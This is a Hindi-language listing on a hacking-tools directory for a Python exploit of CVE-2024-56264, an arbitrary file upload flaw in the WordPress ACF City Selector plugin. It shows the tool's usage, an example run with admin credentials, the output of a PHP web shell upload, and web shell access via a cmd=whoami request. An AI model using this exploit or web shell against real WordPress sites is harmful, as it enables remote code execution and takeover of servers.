Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56264 — WordPress ACF City Selector प्लगइन <= 1.14.0 - मनमाना फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-56264
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-56264

CVE-2024-56264

WordPress ACF City Selector प्लगइन <= 1.14.0 - मनमाना फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-56264

WordPress ACF City Selector - मनमाना फ़ाइल अपलोड शोषण (CVE-2024-56264)

अवलोकन

इस रिपॉज़िटरी में CVE-2024-56264 के लिए एक शोषण (exploit) शामिल है, जो WordPress ACF City Selector प्लगइन (संस्करण <= 1.14.0) में पाया जाने वाला एक मनमाना फ़ाइल अपलोड (Arbitrary File Upload) दोष है। यह भेद्यता एक हमलावर को किसी असुरक्षित WordPress इंस्टेंस पर एक दुर्भावनापूर्ण PHP फ़ाइल (वेब शेल) अपलोड करने और सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

CVE विवरण

  • CVE ID: CVE-2024-56264
  • प्रकाशन तिथि: 2 जनवरी, 2025
  • प्रभावित प्लगइन: ACF City Selector
  • असुरक्षित संस्करण: <= 1.14.0
  • प्रभाव: अप्रतिबंधित फ़ाइल अपलोड के माध्यम से रिमोट कोड निष्पादन (RCE)

विवरण

ACF City Selector प्लगइन अपलोड की गई फ़ाइलों का उचित रूप से सत्यापन करने में विफल रहता है, जिससे हमलावर प्रतिबंधों को बायपास कर सकते हैं और मनमानी PHP फ़ाइलें अपलोड कर सकते हैं। एक बार दुर्भावनापूर्ण PHP फ़ाइल अपलोड हो जाने के बाद, एक हमलावर सिस्टम कमांड को दूरस्थ रूप से निष्पादित कर सकता है, जिससे सर्वर से पूर्ण समझौता हो सकता है।

आवश्यकताएँ

📌 निर्भरताएँ

स्क्रिप्ट चलाने से पहले निम्नलिखित स्थापित होना सुनिश्चित करें:

  • Python 3.x
  • requests मॉड्यूल (स्थापित करने के लिए: pip install requests)

आप सभी आवश्यक निर्भरताएँ इस प्रकार स्थापित कर सकते हैं:

pip install -r requirements.txt

🚀 उपयोग

शोषण चलाना:

usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

उदाहरण:

python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

अपेक्षित आउटपुट

सफल शोषण के बाद, आपको यह देखना चाहिए:

[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

शोषण-पश्चात (Post-Exploitation)

सफल होने पर, अपलोड किए गए शेल तक इस प्रकार पहुँचें:

http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

यह सर्वर पर रिमोट कमांड निष्पादन की अनुमति देता है।

⚠ अस्वीकरण (Disclaimer)

यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है और इसके गंभीर परिणाम हो सकते हैं। लेखक इस शोषण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें